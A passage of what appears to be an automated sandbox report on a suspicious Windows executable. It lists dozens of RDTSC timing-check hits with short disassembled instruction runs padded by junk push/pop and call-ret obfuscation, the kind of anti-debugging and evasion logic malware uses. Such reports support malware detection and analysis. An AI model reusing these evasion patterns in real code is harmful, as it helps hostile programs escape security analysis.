0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97EDD second address: A97EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97169 second address: A9716F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9616D second address: A96184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97EE1 second address: A97EF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9716F second address: A97173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A96184 second address: A9618A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98E2F second address: A98E8A instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD08B70876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 movzx edi, ax 0x00000015 push 00000000h 0x00000017 sbb ebx, 0D181A02h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007EFD08B70878h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jg 00007EFD08B70881h 0x0000003f push eax 0x00000040 push ecx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98E8A second address: A98E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99D8D second address: A99DAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99DAB second address: A99DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99DAF second address: A99E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007EFD08B70878h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+1247905Ah], ecx 0x00000028 mov dword ptr [ebp+1247905Ah], ecx 0x0000002e mov dword ptr [ebp+122D2780h], ecx 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D363Ch], edi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007EFD08B70878h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 pushad 0x00000059 push edx 0x0000005a add dword ptr [ebp+122D31D0h], eax 0x00000060 pop ebx 0x00000061 mov edx, dword ptr [ebp+1244E401h] 0x00000067 popad 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99E2D second address: A99E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99E31 second address: A99E3B instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD08B70876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9AD42 second address: A9AD48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9AD48 second address: A9AD4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9AD4F second address: A9AD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jg 00007EFD08D543FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A99FA6 second address: A99FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9808F second address: A98141 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD08D543F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007EFD08D54401h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007EFD08D543F8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+122D286Ah] 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov edi, dword ptr [ebp+122D26D4h] 0x00000047 jmp 00007EFD08D54407h 0x0000004c mov eax, dword ptr [ebp+122D0CD5h] 0x00000052 mov di, dx 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push ebx 0x0000005a call 00007EFD08D543F8h 0x0000005f pop ebx 0x00000060 mov dword ptr [esp+04h], ebx 0x00000064 add dword ptr [esp+04h], 00000014h 0x0000006c inc ebx 0x0000006d push ebx 0x0000006e ret 0x0000006f pop ebx 0x00000070 ret 0x00000071 stc 0x00000072 nop 0x00000073 jne 00007EFD08D543FEh 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jp 00007EFD08D543F8h 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E004 second address: A9E00E instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD08B70876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E00E second address: A9E018 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD08D543FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E0ED second address: A9E0F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E0F2 second address: A9E0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA418E second address: AA4196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA4196 second address: AA419F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA419F second address: AA41B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B70884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA41B7 second address: AA41DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFD08D54408h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA41DA second address: AA41E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4D0C2 second address: A4D0D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD08D543FEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jc 00007EFD08D543F6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4D0D9 second address: A4D112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B70885h 0x00000009 pop ecx 0x0000000a jp 00007EFD08B7088Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AABC09 second address: AABC0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0CF8 second address: AB0CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0CFC second address: AB0D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0D00 second address: AB0D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0E11 second address: AB0E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0E15 second address: AB0E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jno 00007EFD08B70876h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFD08B7087Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0E33 second address: AB0E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0E37 second address: AB0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007EFD08B70889h 0x00000011 push esi 0x00000012 js 00007EFD08B70876h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0E6D second address: AB0E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DF55 second address: A3DF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B70885h 0x00000009 pop ebx 0x0000000a jmp 00007EFD08B70884h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DF83 second address: A3DF92 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007EFD08D543F6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DF92 second address: A3DFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFD08B70876h 0x0000000a jnc 00007EFD08B70876h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007EFD08B70887h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DFC2 second address: A3DFC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3DFC6 second address: A3DFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB65A6 second address: AB65C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFD08D54409h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB65C5 second address: AB65CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB6FC9 second address: AB6FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7159 second address: AB715F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB715F second address: AB7165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABCC6E second address: ABCC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABCC73 second address: ABCC78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBBF0 second address: ABBC16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B7087Ah 0x00000007 jmp 00007EFD08B70884h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBC16 second address: ABBC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08D54409h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABC909 second address: ABC919 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD08B70876h 0x00000008 jg 00007EFD08B70876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0D71 second address: AC0D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0D77 second address: AC0D7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0D7D second address: AC0D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0D83 second address: AC0D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007EFD08B70876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0D8D second address: AC0DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007EFD08D543F8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jnp 00007EFD08D543FCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0DA8 second address: AC0DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007EFD08B7087Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC504E second address: AC5054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A86942 second address: A869C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007EFD08B70878h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 add dword ptr [ebp+122D2386h], eax 0x0000002c lea eax, dword ptr [ebp+1247C66Bh] 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007EFD08B70878h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D2386h], ecx 0x00000052 nop 0x00000053 jmp 00007EFD08B7087Ah 0x00000058 push eax 0x00000059 pushad 0x0000005a jp 00007EFD08B7087Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A86FE0 second address: A86FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8709B second address: A870C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007EFD08B70887h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A870C1 second address: A870E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007EFD08D543F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFD08D54405h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A870E9 second address: A87112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007EFD08B7087Bh 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A871FB second address: A87201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87722 second address: A87728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87728 second address: A8774B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFD08D54406h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8774B second address: A8774F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8774F second address: A87755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87A14 second address: A87AEF instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD08B7088Dh 0x00000008 jmp 00007EFD08B70887h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007EFD08B70883h 0x00000015 nop 0x00000016 mov dl, AEh 0x00000018 lea eax, dword ptr [ebp+1247C6AFh] 0x0000001e mov dh, cl 0x00000020 sub ecx, dword ptr [ebp+122D2B66h] 0x00000026 nop 0x00000027 pushad 0x00000028 jmp 00007EFD08B7087Bh 0x0000002d pushad 0x0000002e jp 00007EFD08B70876h 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 push ecx 0x0000003a js 00007EFD08B7087Ch 0x00000040 pop ecx 0x00000041 nop 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007EFD08B70878h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c mov dword ptr [ebp+122D21DCh], ecx 0x00000062 mov dh, ch 0x00000064 lea eax, dword ptr [ebp+1247C66Bh] 0x0000006a jmp 00007EFD08B7087Eh 0x0000006f push eax 0x00000070 pushad 0x00000071 jmp 00007EFD08B70885h 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007EFD08B70889h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87AEF second address: A6CB13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D21DCh], ecx 0x00000010 call dword ptr [ebp+1245E85Ah] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007EFD08D543FEh 0x0000001d jmp 00007EFD08D543FEh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6CB13 second address: A6CB21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4675 second address: AC4697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFD08D54404h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007EFD08D543F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4ADE second address: AC4AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007EFD08B70876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4C7F second address: AC4C95 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD08D543F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007EFD08D543FCh 0x00000010 jno 00007EFD08D543F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4C95 second address: AC4C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4C9B second address: AC4C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4C9F second address: AC4CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007EFD08B70881h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC7C27 second address: AC7C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54400h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC07D second address: ACC081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC081 second address: ACC085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC1B3 second address: ACC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC1B9 second address: ACC1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
